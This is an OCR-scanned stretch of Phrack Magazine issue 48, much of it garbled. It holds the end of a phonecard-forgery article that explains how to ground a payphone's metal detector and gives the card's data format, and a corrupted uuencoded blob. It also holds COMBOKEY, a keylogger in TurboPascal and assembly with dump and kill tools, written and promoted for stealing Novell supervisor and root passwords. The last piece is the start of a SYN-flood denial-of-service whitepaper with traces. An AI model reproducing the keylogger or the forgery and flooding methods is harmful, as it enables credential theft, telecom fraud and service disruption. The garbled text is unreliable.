Sel 


Register 


Pag 


Register 
Indirect 


INT 


RB 


RTCC Overf] 


Pag 


r Interrupt 


Port Ch. 


INT 


RTCC Overf]l 
PIC16C71 A/D I 
PIC16C84 E 


lr Interrupt 


LOW 


Select 1 


Addressing Reg. 


Flag 


Enable 
Int. 
nt. 


Fl 


= 


Global Interrupt Enabl 


A/D 
A/D 
A/D 
A/D 
A/D 
A/D 
A/D 


Prescaler 
Prescaler 
Prescaler 
Prescaler 
RTCC Signal 
RTCC Signal 
Interrupt 
Port B Pull 


Bit 
Bit 
Bit 


0 
1 
2 


Sel 


Enable 


Converter Channel] 
Conversion Clock S 
Conversion Clock S 


RB Port change interrupt flag 


low Interrupt Flag 
Interrupt 


Enable 


Enable 
Enable 
EPROM Write Int. 


Enable 
e 


Assignment Bit 
Edge Sel 
l Source 
Edge Select 


-up 


lect 


ect 


Converter Power Switch 

Conversion Interrupt Flag 
Conversion Start 
Converter Channel 


Flag 


Select 0 


Select 1 


elect 0 
elect 0 


RAOQ-RA3 Configuration Bit 0 
RAOQ-RA3 Configuration Bit 0 


Read Data Flag 


Data Flag 
Enable Flag 


PIC16C84 EEPROM 
PIC16C84 EEPROM Write 
PIC16C84 EEPROM Write 
PIC16C84 EEPROM Write 
PIC16C84 EEPROM 


Error Flag 


Interrupt Flag 


Page Sel. 
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<End of PICREG.EQU>. 


he Security System: 


he security of the Schlumberger card system depends strongly on two 
things: the metal detector in the card reader which senses if there is 
any metal on the card where there shouldn’t be any metal. Circuit traces 


on a home built card is definitively made of metal. So, we have to 
figure out a way of getting around this problem... Well, that isn’t 
really too hard! They made one really big mistake: If the metal detector 
is grounded, it doesn’t work!! If you look at the printout of my layouts 


for this card you’ll find one big area of the board that is rectangle 
shaped. In this area you should make a big blob of solder that is 
between 2-3 millimeters high (approximately!) . When the card slides into 
the phone, the blob should be touching the metal detector and since the 
blob is connected to ground the detector is also being grounded. The 
phone also counts the number of times the metal detector gets triggered 
by foreign objects in the card reader (Meaning that the phone companies 
security staff can see if someone’s attempting to use a fake card that 
doesn’t have this counter-measure on it!) and this is of course included 
in the daily service report the phone sends to the central computer. 


The second security lies in the cards first 12 bytes, it’s not just what 
it appears to be: a serial number, it’s more than that. Part of the 
first byte is a checksum of the number of 1’s in the 11 bytes following 
it. Then byte 2 is always $83, identifying the card as an electronic 
phonecard. Byte 3 and 4 is the number of units on the card: The first 
nibble of byte 3 is always $1 and then in the remaining three nibbles 
the number of units is stored in BCD code, for example $11,$22 means 120 
units (Two units is always fused at the factory as a test, s the text 
by Stephane Bausson!) Then we have 4 bytes of card serial number data, 2 
bytes of card checksum (calculated with a 16 bit key stored in the 
payphone’s ROM), 1 byte that is always $11, and then at last, byte 12 
which is the country identifier. 


The Parts Needed: 
O1 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package) 
01 * 4 MHz Ceramic Resonator, Surface Mounted 
02 * 22 pF Capacitors, Surface Mounted (Size 1206). 
Ol * 0.8mm thick single sided circuit board with P20 photoresist 


The Construction: 

Since this project is obviously not intended for the novice in 
electronics I will not go into the basic details of soldering/etching 
circuit boards. If you do not know much of this, ask a friend who does 
for help. If you want to reach me for help, write to Phrack and ask them 
to forward the letter to me as I wish to remain anonymous —- This project 
will probably upset a lot of phone companies and last but not least the 
guys at Schlumberger Tech. 


The UUEncoded Part: 


In this part of the phile you will find circuit board layouts for Tango 
PCB as well as HP LaserJet binary files which will output the layout 
when printed from DOS with the PRINT command. 


You will also find another version of the source code to use if your PIC 
programmer can’t handle the programming of the 64 byte Data EEPROM 
array. 


<UUEncoded Part Begins Here>. 
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section 1 of uuencode 5.22 of file telecard.zip 
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‘ 


end 


sum -r/size 61640/45861 section 
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MY YVAMOS SIP SY S88 YN IGT ERI S19395$05) S4DYS5S! + 
M***(*)=*+AUS6_@T604**#X-***, 
M1"YOOT) O2PS"S**4****" 4v4C%=O) .STS,) ***@R*4* 
M***6;P**5$5,14—-!4D0N4%) .4$L! ‘AO *%*****@*BG8O' 45.SGID!0**S!<* 
MY SBMS ATEN NO OTL VARWANI S14 3654705) $+ 


PEE TAY EN TA 


‘(-1°*141 


VVVVV VV VV VV VY 


VY NV NN INQ ATS VSO 1*$193S5#4D0R+DASES | + 
LAG YS SDVES A ON SSN ENG EMS SES VES MED 
=O.) i, i a ae Se a oA 


>O)T?/S 
‘0(4*!0* 
L4Q%0TS2 


B,P,5!+!08*****S0*%1*-@# 


(from "begin" to "end") 
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<UUEncoded Part Ends Here!>. 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 12 of 18 


COMBOKEY and the Simplistic Art of PC Hacking 
Hope 
KeyTrap Revisited 


by Sendai 
(with apologies to Dcypher) 
NOTE: Of course I take no responsibility when you use this and get 
kicked out of school or something stupid. Besides, why would you be so 
stupid as to get caught in the first place? :-) So be careful, and have 
fun. Don’t get stupid. 


WHAT YOU NEED FOR ANY OF HIS TO MAKE SENSE: 

* At least a reading knowledge of TurboPascal and 8086 assembly 

* A tolerable understanding of how the PC actually works or 

* A copy of Queue’s "MS-DOS Programmer’s Reference" 

* A copy of that yellow-spined "Indespensable PC Hardware Reference" book 


5 


ON WITH IT... 

It was with a little dissatisfaction that I read Dcypher’s KeyTrap 
article the other day (so I’m back-logged a few issues, so sue me!) 

I’ve been foolin’ around with a version of this that I first wrote about 
five years ago during high school, and well, I thought mine was a little 
easier to understand. 


So I’m gonna show you my version, actually explain how the damn thing 
works, and hope somebody out there has their day brightened by using 
this program. 


Note that the only reason I wrote this thing was to record passwords on 
a Novell net. It will record all keypresses, but it really has limited 
use other than hacking. 


Fun fact: With this program, it has taken me an average of about six 
hours to snag supervisor on every Novell net I’ve nailed. And I’m sure 
you can do better. ;-) 


PC KEYBOARD HANDLING 101 

Okay, a quick review for those PC newbies out there. When a key is 
pressed on a PC, it generates an interrupt 9 (keyboard interrupt), 
causing the machine to look up the address of the 9th Interrupt Service 
Routine. The ISR is typically in ROM; the interrupt vector itself is 
not. 


A key recorder is a program that simply latches itself into the 
interrupt 9 handler by replacing the old vector with its own address. 
By doing this, every time a key is pressed, we know about it. 


ENTER COMBOKEY (That’d be the key recorder) 

I differ with my strategy from Dcypher in that I don’t bother going 
directly to the keybard hardware. COMBOKEY just goes ahead and calls 
the old ISR and then looks in the BIOS keyboard buffer to see what the 
key was. Yeah, you don’t get the funky-ass key combinations like 
control-shift-right-alt-F2-Z, but hey, I’m just after the passwords. 


When a new key is pressed, it’s dumped in the buffer. When the buffer 
is full, nothing happens. I’11 leave writing it to a file as an 
exercise to the reader. 


My favorite feature, if I may say so myself, is the fact that COMBOKEY 
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has an API in it, sort of. Interrupt 255 is also latched and provides 

the "user" an interface to the presently running copy of COMBOKEY. But 
not just anyone can go poking into 255 to kill COMBOKEY or get a buffer 
dump or whatever. First, you gotta send a combination. 


Look at the "const" section of COMBOKEY and you’ll see a constant array 
of four bytes. Change these numbers to whatever the hell you want. To 
use the COMBOKEY interface you need to send each of these bytes 
sequentially in AX to ISR 255. Look at the "DoCombo" procedure in Dump 
or Kill to see what I mean. 


After you send the combo, you send one more byte that represents the 
command. 


Dump buffer: AX=COh Dumps the buffer to a chunk of memory at ES:DI. 
Get info: AX=C2h Sends a TinfoRec (see source) to ES:DI. 

Kill: AX=Clih Deactivates the recorder. 

There are two additional programs following: Dump and Kill. These just 


use the interface to do their appropriate actions. 


HE PROPER ETIQUETTE OF COMBOKEY 

There’s a good deal of social engineering involved with using COMBOKEY. 
Since it works on only the machine you put it on, you have to know where 
to put it in the first place to be most effective. (Or be really 
resourceful and put it on every machine around.) 


To maximize your amusement, get the supervisor password first, and then 
put this program in the startup sequence of the network. Then go nuts. 


This program gets REALLY fun when your net is equipped with TCP/IP apps 
like Telnet, and some moron has their home machine hooked up to the 
Net, and they actually log into it with root from your net. Instant 
party. 


NEAT TRICKS TO TRY 

If I ever get around to it, it’d be cool to use the IPX interface to 
actually broadcast the keystrokes over to a waiting machine for instant 
feedback. 


The next trick to try is to maybe build a hardware version of this with 
a little microcontroller. A Motorola 68HC11 would do nicely. This 
would get rid of the pesky problem of reseting the machine or turning 
the power off. 


Ah well. Comments and the like to jsrs@cyberspace.com. Happy hunting. 


{ Source notes: 
This’ ll compile on TurboPascal 6 or better. Might even work with 5. 


Why Turbo? Cause it generates damn tight code, and it’s much more readable 


for the newbies than all assembly. } 


{ComboKey - It’s a TSR, so we gotta do the mem setup. } 
{SM 1024, 0, 2100} 
program ComboKkey; 


uses Dos; { For Keep() } 


const 
DUMP_BUFFER = 
KILL RECORDER 
GET_INFO = SC 


$CO; 
= $Cl; 


la 


BUFSIZE = 2048; { In bytes, NOT paragraphs! } 
DISPLAY_MAX = 100; 
combo: Array[0..3] of Byte = ( 01, 01, 19, 74 ); 
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type 
PBuf = *TBuf; 
PInfoRec = 
TInfoRec = reco 
buffer _siz 
overwrite: 
buffer_ptr 


end; 


var 


old9o0, o 
wptr: 


q_top: Word absol 


1d9s: 


rd 
e: 


Word; 


TBuf = Array[0..BUFSIZE-1] 
“TiInfoRec; 


Word; 
: Word; 


Word; 
Word absolute $40:$1c; 
lute $40:$80; 
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of Byte; 


{ Word is 16 bit, 


unsigned } 


{ Must be 


in this order! } 


{ Ptr to next avail slot in kbd buffer } 


DI, DS, ES, 


gq_bot: Word absolute $40:$82; 
buffer: PBuf; 
buf_ptr: Word; 
overwrite_ctr: Word; 
last_wptr: Word; 
tumbler: Byte; { How many numbers in the combo right so far? } 
procedure SetVector( int: Byte; s, o: Word); 
begin 
asm 
push ds 
cli 
mov ah, 25h 
mov al, int 
mov ds, s 
mov dx, oO 
int 21h 
sti 
pop ds 
end; 
end; 
procedure NewInt09(Flags, CS, IP, AX, BX, CX, DX, SI, 
interrupt; 
var 
offset: Word; 
c: Byte; 
1: Word; 
ctr: Word; 
begin 


{ First call the old handler. 


interrupt handler. 
asm 


Do the pushf, 


cause this is an 


pushft 
call dword ptr [o0ld9o] { Since old9s is next, it works } 
cli 

end; 

{ This isn’t a press, but a release - ignore it. } 

if last_wptr = wptr then Exit; 


last_wptr:=wptr; 


{ Did the queue just wrap? } 


at 
ls 


(weptr = q_top) 
offset:=wptr-2; 


Inc (buf_ptr); 


Ix 


then begin { we’d write it, 


if (buf_ptr BUFSIZE) 
buf_ptr:=0; 
Inc (overwrite_ctr); 
end; 


buffer% [buf_ptr] 


:=Mem[$40:offset]; 


then offset:=q_bot-2 


but oh well. 


} 
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asm 


end; 
end; 


sti 


{ Here’s the interfac 


system. 


cause who uses it anyway?! } 


procedure NewIntFF (Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: 
interrupt; 
var 
command: Word; 
res, rdi: Word; 
infoptr: PInfoRec; 
lL: Word; 
begin 
command: =AX; 
res:=ES; 
rdi:=DI; 
if tumbler=4 then begin { we have a winner... } 
tumbler:=0; 
asm 
sti 
end; 
case command of 
DUMP_BUFFER: begin 
asm 
push ds 
mov cx, BUFSIZE 
mov es, [res] 
mov di, [rdi] 
mov ax, [WORD PTR buffer+2] 
mov ds, ax 
mov ax, [WORD PTR buffer] 
mov Si, ax 
cld 
rep movsb 
pop ds 
end; 
end; 
KILL_RECORDER: begin 
SetVector(9, old9s, ol1d9o); 
end; 
GET_INFO: begin 
asm 
mov es, res] 
mov di, rdi] 
mov ax, BUFSIZE 
mov es:[di], ax 
mov ax, [overwrite_ctr] 
mov es:[dit2], ax 
mov ax, [buf_ptr] 
mov es:[dit4], ax 
end; 
end; 
end; 
asm 
ona 
end; 
end; 
if command=combo[tumbler] then Inc(tumbler) 


:41 2017 


Don’t bother saving the old S$FF, 


Word); 
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else tumbler:=0; 


end; 
begin 

asm 
mov ah, $35 
mov al, 9 
int? $22 
mov ax, es 
mov old9s, ax 
mov old9o0, bx 

end; 


SetVector(9, Seg(NewInt09), Ofs(NewInt09)); 
SetVector(255, Seg(NewIntFF), Ofs(NewIntFF) ); 


buffer:=New (PBuf) ; 
buf_ptr:=0; 
overwrite_ctr:=0; 
last_wptr:=0; 
tumbler:=0; 


Keep (0) ; 
end. 


{ Kills the keyrecorder } 
program Kill; 


const 
combo0 = 01; 
combol = 01; 
combo2 19: 
combo3 = 74; 


KILL_RECORDER = $C1; 


procedure ResetCombo; 
var 
1: Word; 
begin 
for l:=1 to 4 do asm 
mov ax, O 
int Sfft 
end; 
end; 


procedure DoCombo; 


begin 
asm 
mov ax, combo0 
int Sff 
mov ax, combol 
int Sff 
mov ax, combo2 
int Sff 
mov ax, combo3 
int Sff 
end; 
end; 
begin 
ResetCombo; 


DoCombo; 
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sm 
mov 
int 


end; 


end. 


ax, 
Sff 


KILL_ 


RECORDER 


{ Synt 


ax: 


DUMP DESTE 


This 
no f 


ILE. 


FIL 


ile is gi 


ven, 


program Dump; 


const 
ic 


ombo0 = 0 


combol = 0 
combo2 = 1 
combo3 = 7 


D 


G 


type 


UMP_BUFFE 
ET INFO = 


PiInfoRec = *TInfoRec; 


TInfoRec = record 
buffer_size: Word; 
overwrite: Word; 
buffer_ptr: Word; 

end; 

var 

info: TInfoRec; 

buffer: Array[0..8191] of Byte; 

i Word? 

fs “Texts 


procedure ResetCombo,; 
var 


1: Wo 


begin 


Ror: 


end; 


end; 


rd} 


:=1 
mov 
ante 


procedure DoCombo; 
begin 


asm 


end; 


end; 


begin 
Ass 


mov 
int 
mov 
int 
mov 
int 
mov 
int 


to 4 
ax, 
StF 


ax, 
Sff 
ax, 
Sff 
ax, 
Sti 
ax, 
Sff 


do asm 


combo0 


combol 


combo2 


combo3 


ign(f, ParamStr(1)); 
Rewrite (f); 


‘11 dump the buffer information and contents to the file. 
it goes to the screen. 


} 


If 
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ResetCombo; 


DoCombo; 
asm 
mov ax, S 
mov eS, a 
mov di, OFFSET info 
mov ax, G 
int Sff 


end; 


writeln(f,’Buffer size: '’,info.buffer_size); 
writeln(f,’Buffer ptr: ’,info.buffer_ptr); 
writeln(f,’Overwrite: ’,info.overwrite); 


DoCombo; 

asm 
mov ax, S 
mov eS, a 
mov di, OFFSET buffer 
mov ax, DUMP _BUFFER 
int S$ff 


EG buffer 


end; 


for 1:=0 to info.buffer_ptr do begin 
write(f, Char(buffer[1])); 
if buffer[l] = 13 then write(f, #10); 
end; 


Close (f); 
end. 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 13 of 18 


[ Project Neptune ] 


by daemon9 / route / infinity 
for Phrack Magazine 
July 1996 Guild Productions, kid 


comments to route@infonexus.com 


This project is a comprehensive analysis of TCP SYN flooding. You 
may be wondering, why such a copious treatment of TCP SYN flooding? 
Apparently, someone had to do it. That someone turned out to be me (I need 
a real hobby). The SYNflood Project consists of this whitepaper, including 
anotated network monitor dumps and fully functional robust Linux sourcecode. 


—--[{ Introduction ]-- 


TCP SYN flooding is a denial of service (DOS) attack. Like most DOS 
attacks, it does not exploit a software bug, but rather a shortcoming in the 
implemenation of a particular protocol. For example, mail bombing DOS attacks 
work because most SMTP agents are dumb and will accept whatever is sent their 
way. ICMP_ECHO floods exploit the fact that most kernels will simply reply to 
ICMP_ECHO request packets one after another, ad inifintum. We will see that 
TCP SYN flood DOS attacks work because of the current implementation of TCP’s 
connection establishment protocol. 


[ Overview  ] 


This whitepaper is intended as a complete introduction to TCP SYN 
flooding (refered to hereafter as SYN flooding). It will cover the attack 
in detail, including all relevant necessary background information. It is 


organized into sections: 


Section I. TCP Background Information 

Section II. TCP Memory Structures and the Backlog 
Section III. TCP Input Processing 

Section IV. The Attack 

Section V. Network Trace 

Section VI. Neptune.c 

Section VII. Discussion and Prevention 

Section VIII. References 


(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first 
read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz) 


[ The Players ] 


A: Target host 

xX Unreachable host 

Z Attacking host 

) Attacker masquerading as the unreachable 


--[ The Figures ]-- 


There are a few network transaction figures in the paper and 
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they are to be interpreted as per the following example: 


tick host a control host b 
tick: 

A unit of time. There is no distinction made as to *how* much time 
passes between ticks, just that time passes. It’s generally not going to be 
a great deal. 
host a: 


A machine particpating in a TCP-based conversation. 
control: 

This field shows any relevant control bits set in the TCP header and 
the direction the data is flowing 
host b: 

A machine particpating in a TCP-based conversation. 


For example: 
1 A -—--SYN---> B 
In this case, at the first refrenced point in time, host a is sending 


a TCP segment to host b with the SYN bit on. Unless stated, we are generally 
not concerned with the data portion of the TCP segment. 


Section I. TCP Background Information 


TCP is a connection-oriented, reliable transport protocol. TCP is 
responsible for hiding network intricacies from the upper layers. A 
connection-oriented protcol implies that the two hosts participating ina 
discussion must first establish a connection before data may be exchanged. In 
TCP’s case, this is done with the three-way handshake. Reliability can be 
provided in a number of ways, but the only two we are concerned with are data 
sequencing and acknowledgement. TCP assigns sequence numbers to every byte in 
every segment and acknowledges all data bytes recieved from the other end. 
(ACK’s consume a sequence number, but are not themselves ACK’d. That would be 
ludicris.) 


--[ TCP Connection Establishment ]-- 


In order to exchange data using TCP, hosts must establish a connection. 
TCP establishes a connection in a 3 step process called the 3-way handshake. 
If machine A is running a client program and wishes to conect to a server 
program on machine B, the process is as follows: 


fig (1) 
au A ---SYN---> B 
2 A <---SYN/ACK--- B 
3 A ---ACK---> B 


At (1) the client is telling the server that it wants a connection. 
This is the SYN flag’s only purpose. The client is telling the server that 
the sequence number field is valid, and should be checked. The client will 
set the sequence number field in the TCP header to it’s ISN (initial sequence 


number). The server, upon receiving this segment (2) will respond with it’s 
own ISN (therefore the SYN flag is on) and an ACKnowledgement of the clients 
first segment (which is the client’s ISN+1). The client then ACK’s the 


server’s ISN (3). Now data transfer may take place. 
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--[ TCP Control Flags ]|-- 


There are six TCP control flags. We are only concerned with 3, but 
the others are included for posterity: 


* SYN: Synchronize Sequence Numbers 

The synchronize sequence numbers field is valid. This flag is only 
valid during the 3-way handshake. It tells the receiving TCP to check the 
sequence number field, and note it’s value as the connection-initiator’s 
(usually the client) initial sequence number. TCP sequence numbers can 
simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. 
Every byte of data exchanged across a TCP connection (along with certain 
flags) is sequenced. The sequence number field in the TCP header will contain 
the sequence number of the *first* byte of data in the TCP segment. 


*ACK: Acknowledgement 
The acknowledgement number field is valid. This flag is almost always 
set. The acknowledgement number field in the TCP header holds the value of 


the next *expected* sequence number (from the other side), and also 
acknowledges *all* data (from the other side) up through this ACK number minus 
one. 


*RST4 Reset 

Destroy the referenced connection. All memory structures are torn 
down. 
URG: Urgent 


The urgent pointer is valid. This is TCP’s way of implementing out 
of band (OOB) data. For instance, in a telnet connection a ‘ctrl-c* on the 
client side is considered urgent and will cause this flag to be set. 


PSH: Push 
The receiving TCP should not queue this data, but rather pass it to 
the application as soon as possible. This flag should always be set in 


interactive connections, such as telnet and rlogin. 


FIN: Finish 
The sending TCP is finished transmitting data, but is still open to 
accepting data. 


ao [ROrtES «| — 


To grant simultaneous access to the TCP module, TCP provides a user 
interface called a port. Ports are used by the kernel to identify network 
processes. They are strictly transport layer entities. Together with an 
IP address, a TCP port provides provides an endpoint for network 
communications. In fact, at any given moment *all* Internet connections can 
be described by 4 numbers: the source IP address and source port and the 
destination IP address and destination port. Servers are bound to 
‘well-known’ ports so that they may be located on a standard port on 


different systems. For example, the telnet daemon sits on TCP port 23. 


Section II. TCP Memory Structures and the Backlog 


For a copius treatment of the topic of SYN flooding, it is necessary 
to look at the memory structures that TCP creates when a client SYN arrives 
and the connection is pending (that is, a connection that is somewhere in 
the process of the three-way handshake and TCP is in the SYN_SENT or 
SYN_RVCD state). 
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== BSD. J-= 


Under BSD style network code, for any given pending TCP connection 
there are thr memory structures that are allocated (we do not discuss the 
process (proc) structure and file structure, but the reader should be aware 
that they exist as well.): 


Socket Structure (socket{}): 

Holds the information related to the local end of the communications 
link: protocol used, state information, addressing information, connection 
queues, buffers, and flags. 


Internet Protocol Control Block Structure (inpcb{}): 

PCB’s are used at the transport layer by TCP (and UDP) to hold various 
pieces of information needed by TCP. They hold: TCP state information, IP 
address information, port numbers, IP header prototype and options anda 
pointer to the routing table entry for the destination address. PCB’s are 
created for a given TCP based server when the server calls listen(), 


TCP Control Block Structure (tcpcb{}): 
The TCP control block contains TCP specific information such as timer 
information, sequence number information, flow control status, and OOB data. 


--[{ Linux ]-- 


Linux uses a different scheme of memory allocation to hold network 
information. The socket structure is still used, but instead of the pcb{} 
and tcpcb{}, we have: 


Sock Structure (sock{}): 

Protocol specific information, most of the data structures are TCP 
related. This is a huge structure. 
SK Structure (sk_buff{}): 

Holds more protocol specific information including packet header 
information, also contains a sock{}. 


According to Alan Cox: 

The inode is the inode holding the socket (this may be a dummy inode 
for non file system sockets like IP), the socket holds generic high level 
methods and the struct sock is the protocol specific object, although all but 
a few experimental high performance items use the same generic struct sock and 
support code. That holds chains of linear buffers (struct sk_buff’s). 


[ struct inode -> struct socket -> struct sock -> chains of sk_buff’s ] 


-—-[ The Backlog Queue] -- 


These are large memory structures. Every time a client SYN arrives 
on a valid port (a port where a TCP server is listen()ing), they must be 
allocated. If there were no limit, a busy host could easily exhuast all of 
it’s memory just trying to process TCP connections. (This would be an even 
simpler DOS attack.) However, there is an upper limit to amount of 
concurrent connection requests a given TCP can have outstanding for a 
given socket. This limit is the backlog and it is the length of the queue 
where incoming (as yet incomplete) connections are kept. This queue limit 
applies to both the number of imcomplete connections (the 3-way handshake has 
not been completed) and the number of completed connections that have not 
been pulled from the queue by the application by way of the accept() call. 
If this backlog limit is reached, we will see that TCP will silently 
discard all incoming connection requests until the pending connections can 
be dealt with. 
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The backlog is not a large value. It does not have to be. Normally 
TCP is quite expedient in connection establishment processing. Even if a 
connection arrived while the queue was full, in all likelyhood, when the 


client retransmits it’s connection request segment, the receiving TCP will 
have room again in it’s queue. Different TCP implementations have different 
backlog sizes. Under BSD style networking code, there is also '’/grace’ margin 
of 3/2. That is, TCP will allow up to backlog*3/2+1 connections. This will 
allow a socket one connection even if it calls listen with a backlog of 0. 
Some common backlog values: 

fig (2) 

OS Backlog BL+Grace Notes 
SunOS 4.x.x 5 8 
TREX. 302, 5 8 
Solaris 
Linux 1.2.x 10 10 Linux does not have this grace margin. 
FreeBSD 2.1.0: 32 
FreeBSD 2.1.5: 128 
Win NTs 3.5.1: 6 6 NT does not appear to have this margin. 
Win NTw 4.0 6 6 NT has a pathetic backlog. 
Section III. TCP Input Processing 


To see exactly where the attack works it is necessary to watch as 
the receiving TCP processes an incoming segment. The following is true for 
BSD style networking, and only processes relevant to this paper are 
discussed. 


A packet arrives and is demultiplexed up the protocol stack to TCP. The TCP 
state is LISTEN: 


Get header information: 

TCP retrieves the TCP and IP headers and stores the information in 
memory. 
Verify the TCP checksum: 

The standard Internet checksum is applied to the segment. If it 
fails, no ACK is sent, and the segment is dropped, assuming the client will 
retranmit it. 

Locate the PCB{}: 

TCP locates the pcb{} associated with the connection. If it is not 
found, TCP drops the segment and sends a RST. (Aside: This is how TCP 
handles connections that arrive on ports with no server listen()ing.) If 
the PCB{} exists, but the state is CLOSED, the server has not called 
connect () or listen(). The segment is dropped, but no RST is sent. The 
client is expected to retransmit it’s connection request. We will see this 
occurence when we discuss the ’Linux Anomaly’. 

Create new socket: 

When a segment arrives for a listen()ing socket, a slave socket is 
created. This is where a socket{}, tcpcb{}, and another pcb{} are created. 
TCP is not committed to the connection at this point, so a flag is set to 
cause TCP to drop the socket (and destroy the memory structures) if an 
error is encountered. If the backlog limit is reached, TCP considers this 
an error, and the connection is refused. We will see that this is exactly 
why the attack works. Otherwise, the new socket’s TCP state is LISTEN, and 
the completion of the passive open is attempted. 

Drop if RST, ACK, or no SYN: 

If the segment contains a RST, it is dropped. If it contains an 
ACK, it is dropped, a RST is sent and the memory structures torn down (the 
ACK makes no sense for the connection at this point, and is considered an 
error). If the segment does not have the SYN bit on, it is dropped. If 
the segment contains a SYN, processing continues. 

Address processing, etc: 
TCP then gets the clients address information into a buffer and 
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connects it’s pcb{} to the client, processes any TCP options, and 
initializes it’s initial send sequence (ISS) number. 
ACK the SYN: 

TCP sends a SYN, ISS and an ACK to the client. The connection 
establishment timer is set for 75 seconds at this point. The state changes 
to SYN_RCVD. Now. TCP is commited to the socket. We will see that this 
is state the target TCP will be in when in the throes of the attack because 
th xpected client response is never received. The state remains SYN_RCVD 
until the connection establishment timer expires, in which case the all the 
memory structures associated with the connection are destroyed, and the 
socket returns to the LISTEN state. 


Section IV. The Attack 


A TCP connection is initiated with a client issuing a request to a 
server with the SYN flag on in the TCP header. Normally the server will 
issue a SYN/ACK back to the client identified by the 32-bit source address in 
the IP header. The client will then send an ACK to the server (as we 
saw in figure 1 above) and data transfer can commence. When the client IP 
address is spoofed to be that of an unreachable, host, however, the targetted 
TCP cannot complete the 3-way handshake and will keep trying until it times 
out. That is the basis for the attack. 

The attacking host sends a few (we saw that as little as 6 is 
enough) SYN requests to the target TCP port (for example, the telnet daemon). 
The attacking host also must make sure that the source IP-address is spoofed 
to be that of another, currently unreachable host (the target TCP will be 
sending it’s response to this address). IP (by way of ICMP) will inform TCP 
that the host is unreachable, but TCP considers these errors to be transient 
and leaves the resolution of them up to IP (reroute the packets, etc) 
effectively ignoring them. The IP-address must be unreachable because th 
attacker does not want *any* host to recieve the SYN/ACKs that will be coming 
from the target TCP, which would elicit a RST from that host (as we saw in 


TCP input above). This would foil the attack. The process is as follows: 
fig (3) 
1 Z (x) =--SYN-=> A 
Z (x) ---SYN---> A 
Z (x) ---SYN---> A 
Z (x) ---SYN---> A 
Z (x) ---SYN--—-> A 
Z (x) SS YN > A 
2 xX <---SYN/ACK--— A 
xX <---SYN/ACK--— A 
3 xX <---RS Tea A 


At (1) the attacking host sends a multitude of SYN requests to the target 

to fill it’s backlog queue with pending connections. (2) The target responds 
with SYN/ACKs to what it believes is the source of the incoming SYNs. During 
this time all further requests to this TCP port will be ignored. The target 
port is flooded. 
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--[ Linux Anomaly ]-- 


In doing my research for this project, I noticed a very strange 
implementation error in the TCP module of Linux. When a particular TCP 
server is flooded on a Linux host, strange things are afoot... First, it 
appears that the connection-establishment timer is broken. The 10 spoofed 
connection-requests keep the sockets in the SYN_RCVD state for just 
over 20 minutes (23 minutesto be exact. Wonder what the signifigance of 
this is... Hmmm...). Much longer than the 75-seconds it *should* be. The 
next oddity is even more odd... After that seemingly arbitrary time period 
(I have to determine what the hell is going on there), TCP moves the flooded 
sockets into the CLOSE state, where they *stay* until a connection-request 
arrives on a *different* port. If a connection-request arrives on the 
flooded port (now in the CLOSE state), it will not answer, acting as if it 
is still flooded. After the connection-request arrives on a different port, 
the CLOSEd sockets will be destroyed, and the original flooded port will be 
free to answer requests again. It seems as though the connection-request 
will spark the CLOSEd sockets into calling listen()... Damn wierd if you ask 
me... 


The implications of this are severe. I have been able to completely 
disable all TCP based servers from answering requests indefinitely. If all 
the TCP servers are flooded, there are none to recieve the valid connection 
request to alleviate the CLOSE state from the flooded connections. Bad 
news indeed. 

[Note: as of 7.15.96 this is a conundrum. I have contacted Alan 
Cox and Eric Schenk and plan to work with them on a solution to this 
problem. I be forthcoming with all our findings as soon as possible. I 
believe the problem to perhaps lie (at least in part) in the 
tcp_close_pending() function... Or perhaps there is a logic error in how 
TCP switches between the connection-establishment timer and the 
keep-alive timer. They are both implemented using the same variable since 
they are mutally exclusive...] 


Section V. Network Trace 


The following is a network trace from an actual SYN flooding session. 
The target machine is Ash, a Linux 1.2.13 box. The attacker is Onyx. The 
network is a 10Mbps ethernet. 


Network Monitor trace Fri 07/12/96 10:23:34 Flood1.TXT 


Frame Time Src MAC Addr Dst MAC Addr Protocol Description 
Src Other Addr Dst Other Addr Type Other Addr 

1 2.519 onyx ash TCP/23 sd Oy en 4, seq:358064326 
9, ack:1380647758, win: 512, sre 192.168.2.2 192.168.2.7 IP 
2 2.520 ash onyx TCP/1510 Be iSie, Lene 4, seq: 65964287 
3, ack:3580643270, win:14335, sre 192.168.2.7 192.168.2.2 TP. 
3 2.520 onyx ash TCP/23 A ape eens 0, segq:358064327 
O, ack: 659642874, win:14260, sre 192.168.2.2 192.168.2.7 IP 

A telnet client is started on Onyx, and we see the standard 3-way 

handshake between the two hosts for the telnet session. 


Lines 4-126 were interactive telnet traffic and added nothing to the 


discussion. 

127 12.804 ash onyx TCP/1510 .A...F, len: 0, seq: 65964340 
8, ack:3580643401, win:14335, sre 192.168.2.7 192.168.2.2 IP 

128 12.804 onyx ash TCP/23 JB ein y, Les 0, seq:358064340 


1, ack: 659643409, win:14322, src 192.168.2.2 192.168.2.7 IP 
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12.805 onyx ash TCP/23 .A...F, len 0, seq:358064340 

659643409, win:14335, sre 192.168.2.2 192.168.2.7 IP 

12.805 ash onyx TCP/1510 iPro sep Len 0, seq: 65964340 

win:14334, sre 192.168.2.7 19231 68.2 92 IP 

Here we s the 4-way connection termination procedure. 

At this point, the flood program is started on onyx, the information 

filled in, and the attack is launched. 

42.251 onyx *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2. 

Onyx is attempting to get ash’s ethernet address using ARP. 

42.251 ash onyx ARP_RARP ARP: Reply, Target IP: 192.168.2.2 

0020AF2311D7 

Ash responds with it’s ethernet address. 

42.252 onyx ash TCP/23 ve @Sic,> len: 0, seq:336494208 
0, win: 242, sre 192.168.2.10 192.168.2.7 IP 

The flood begins. Onyx sends the first of 10 TCP segments with the 

SYN bit on, and the IP address spoofed to the telnet daemon. 

42.252 ash *BROADCAST ARP_RARP ARP: Request, Target IP: 192.168.2. 

Ash immediately attempts to resolve th thernet address. However, 

since there is no such host on the network (and no router to proxy 

the request with) the ARP request will not be answered. The host, 

is in effect, unreachable. 

42.271 onyx ash TCP/23 Seas Sep Len: 0, seq:338171929 
0, win 242, src 192.168.2.10 19216832 07 IP 

